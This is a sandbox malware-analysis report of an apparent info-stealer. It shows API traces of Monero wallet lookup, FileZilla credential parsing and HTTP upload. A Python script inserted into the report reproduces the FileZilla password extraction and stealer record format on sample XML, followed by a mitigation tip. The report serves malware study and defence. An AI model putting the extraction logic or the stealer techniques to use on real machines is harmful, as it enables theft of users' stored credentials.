                              • Instruction ID: 793073d98fc2a1959791a493c43dff6a714e86d3ef6f807cd459d689790a34b0
                              • Opcode Fuzzy Hash: 8bd004c995bd4cb26dc8c519bd316e2c3d0f577b0e7ba96f43b4ccf7c1eb5612
                              • Instruction Fuzzy Hash: 85525CF360C2049FE7046E2DED8577AFBDAEBD4220F1A463DEAC4C3744E93598058696
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                              • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                              • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: db4c2312390718a34b06ff9c57f818459288f0e8e9c43daca1304eb149fea88b
                              • Instruction ID: 85dcdc0e2fe04e797574b7770637834f484a0d05625f06f6faf6eb83b190ef00
                              • Opcode Fuzzy Hash: db4c2312390718a34b06ff9c57f818459288f0e8e9c43daca1304eb149fea88b
                              • Instruction Fuzzy Hash: C311D63184411DABEB24FBB4DC559ED7338EF10300F4146AAA50A57092EF302B4ACBB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *11
                              • API String ID: 0-2724586490
                              • Opcode ID: bcd48a966f0a6e28d461de43bb88be00aaa52653428a0194975b3cdb6d519b05
                              • Instruction ID: 34e5a8a765f459e5a56d28772d03a298e9417a0effe55caacbf24f0f03129814
                              • Opcode Fuzzy Hash: bcd48a966f0a6e28d461de43bb88be00aaa52653428a0194975b3cdb6d519b05
                              • Instruction Fuzzy Hash: D35104B3D087149FE3146A18DC8976BF7D9EF94320F1B4A3DDAD893380EA795C018696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81a3676bc8924aa74720fe9dbe13dabcf8e85acb1260b92d7c544ca5fce92878
                              • Instruction ID: 961130928ad733cebf67641350db73162bf567797d0b8f4bdbf624fcfc74086f
                              • Opcode Fuzzy Hash: 81a3676bc8924aa74720fe9dbe13dabcf8e85acb1260b92d7c544ca5fce92878
                              • Instruction Fuzzy Hash: 285135F3A182105BF3085929DD5A77AB7DADBD4620F2B423DEA49D3B88EC3958064186
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3757b5cb15738641c5d558c933e3ef318f0cafdbbde5031a9f900ba1ef9f9ebd
                              • Instruction ID: f88fcefcedc0300a507d291151cf4e8662923540f47898c41bad804425b1a771
                              • Opcode Fuzzy Hash: 3757b5cb15738641c5d558c933e3ef318f0cafdbbde5031a9f900ba1ef9f9ebd
                              • Instruction Fuzzy Hash: 685103B3A086149FF3047A28DC467BEB7E5EF90320F1B493DDAD593780EA3958408786
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c16933fcdad73f3fe5ffd7f36e59f25cca1d6a3ec882f2bcfc31c4bef0e2e2f
                              • Instruction ID: 6aa3eb89005d94d404e2e85af874c29b59563916ff078a05ab11fb4ca4701134
                              • Opcode Fuzzy Hash: 9c16933fcdad73f3fe5ffd7f36e59f25cca1d6a3ec882f2bcfc31c4bef0e2e2f
                              • Instruction Fuzzy Hash: 5F315BB291C214DFD705BF29D8812BEFBE9EF94310F16482DEAC493254EA7198418B87
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBA,00D50DB7,00D50DB6,00D50DB3), ref: 00D40362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D40369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D40385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D403CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D403DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D40463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D40562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00D40571
                              • lstrcat.KERNEL32(?,url: ), ref: 00D40580
                              • lstrcat.KERNEL32(?,00000000), ref: 00D40593
                              • lstrcat.KERNEL32(?,00D51678), ref: 00D405A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00D405B5
                              • lstrcat.KERNEL32(?,00D5167C), ref: 00D405C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00D405D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00D405E6
                              • lstrcat.KERNEL32(?,00D51688), ref: 00D405F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00D40604
                              • lstrcat.KERNEL32(?,00000000), ref: 00D40617
                              • lstrcat.KERNEL32(?,00D51698), ref: 00D40626
                              • lstrcat.KERNEL32(?,00D5169C), ref: 00D40635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 4d8551878cedbc921aca121f83c3149c6cf5c9e5864c1facdef27d2ce0d1f6f7
                              • Instruction ID: 90de011499efeb4785dbb9c7a301ca55a7f358504b8cc4b0b9a07e348f03281b
                              • Opcode Fuzzy Hash: 4d8551878cedbc921aca121f83c3149c6cf5c9e5864c1facdef27d2ce0d1f6f7
                              • Instruction Fuzzy Hash: 1FD14C76940208AFDB04EBF4DD96EEE7738EF58301F444518F506A6091EF34AA4ADB72
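The function above walks %APPDATA%\Roaming\FileZilla\recentservers.xml with StrStrA for the literal markers <Host>, <Port>, <User> and <Pass encoding="base64"> and concatenates the result into a `browser: FileZilla` record; the same find-marker-then-base64-decode pattern recurs at 00D3C820, where CryptStringToBinaryA does the decoding. The Python below is an added example, not code from the sample or from Joe Sandbox: it reproduces the extraction on a constructed recentservers.xml so an analyst can see what is recoverable from that file. The XML content is constructed; the `:` between host and port and the newline between fields are assumptions (the report shows those separators only as string addresses 00D51678, 00D5167C, 00D51688, 00D51698 and 00D5169C). The second server entry uses FileZilla's master-password format (`<Pass encoding="crypt" ...>`), which a search for the base64 marker does not recover.

```python
import base64
import binascii
from typing import Dict, List, Optional

# Constructed sample of recentservers.xml (not captured from the analysed
# sample). The first <Server> stores its password the default way (base64 of
# the plaintext); the second was saved with a FileZilla master password, which
# switches the element to encoding="crypt".
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
    <RecentServers>
        <Server>
            <Host>ftp.example.test</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <User>deploy</User>
            <Pass encoding="base64">U3VwZXJTZWNyZXQxMjM=</Pass>
            <Logontype>1</Logontype>
        </Server>
        <Server>
            <Host>sftp.example.test</Host>
            <Port>22</Port>
            <Protocol>1</Protocol>
            <User>backup</User>
            <Pass encoding="crypt" salt="Q29uc3RydWN0ZWRTYWx0">AAAAAAAAAAAAAAAAAAAAAAAA</Pass>
            <Logontype>1</Logontype>
        </Server>
    </RecentServers>
</FileZilla3>
"""


def _after_marker(text: str, marker: str, end: str) -> Optional[str]:
    """StrStrA-style walk: locate marker and return the text up to `end`."""
    i = text.find(marker)
    if i == -1:
        return None
    i += len(marker)
    j = text.find(end, i)
    return None if j == -1 else text[i:j]


def extract_filezilla_servers(xml_text: str) -> List[Dict[str, str]]:
    """Recover host/port/user/password per <Server> with substring search only,
    as the analysed function does (no XML parser). Scanning one <Server> block
    at a time avoids pairing a crypt-protected entry's host with the base64
    password of the entry that follows it."""
    results: List[Dict[str, str]] = []
    pos = 0
    while True:
        start = xml_text.find("<Server>", pos)
        if start == -1:
            break
        stop = xml_text.find("</Server>", start)
        if stop == -1:
            break
        block = xml_text[start:stop]
        pos = stop + len("</Server>")
        host = _after_marker(block, "<Host>", "</Host>") or ""
        port = _after_marker(block, "<Port>", "</Port>") or ""
        user = _after_marker(block, "<User>", "</User>") or ""
        b64 = _after_marker(block, '<Pass encoding="base64">', "</Pass>")
        if b64 is not None:
            try:
                password = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
                encoding = "base64"
            except (binascii.Error, ValueError):
                password, encoding = "", "base64-invalid"
        elif '<Pass encoding="crypt"' in block:
            # Master-password protected: needs the user's passphrase, not in the file.
            password, encoding = "", "crypt"
        else:
            password, encoding = "", "none"
        results.append({"host": host, "port": port, "user": user,
                        "password": password, "password_encoding": encoding})
    return results


def format_stealer_record(entry: Dict[str, str]) -> str:
    """Assemble the record the function builds with lstrcat. The labels are the
    report's literal strings; ':' and '\\n' as separators are assumptions."""
    return ("browser: FileZilla\n"
            "profile: null\n"
            f"url: {entry['host']}:{entry['port']}\n"
            f"login: {entry['user']}\n"
            f"password: {entry['password']}\n")


if __name__ == "__main__":
    for e in extract_filezilla_servers(SAMPLE_RECENTSERVERS_XML):
        print(format_stealer_record(e))
```

A single global marker walk for `<Pass encoding="base64">` would skip the crypt-protected entry and attach the next entry's password to its host, which is why the example scans per `<Server>` block. Enabling FileZilla's master password is the practical mitigation against this collector: the file then carries only the salted ciphertext.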
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D359F8
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D35A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008DE550,00000000,?,008D99A8,00000000,?,00D51A1C), ref: 00D35E71
                              • lstrlen.KERNEL32(00000000), ref: 00D35E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D35E9A
                              • lstrlen.KERNEL32(00000000), ref: 00D35EAF
                              • lstrlen.KERNEL32(00000000), ref: 00D35ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FBD
                              • HttpOpenRequestA.WININET(00000000,008DE510,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D35BF8
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: bbd4b3a450890b0a79755838c8a4cabb0232749e78e79c1f735122ea8e5b9e6f
                              • Instruction ID: 5b3a383d371b1b47af93970b802fcde3e827010d314f2e259931f2567c68381f
                              • Opcode Fuzzy Hash: bbd4b3a450890b0a79755838c8a4cabb0232749e78e79c1f735122ea8e5b9e6f
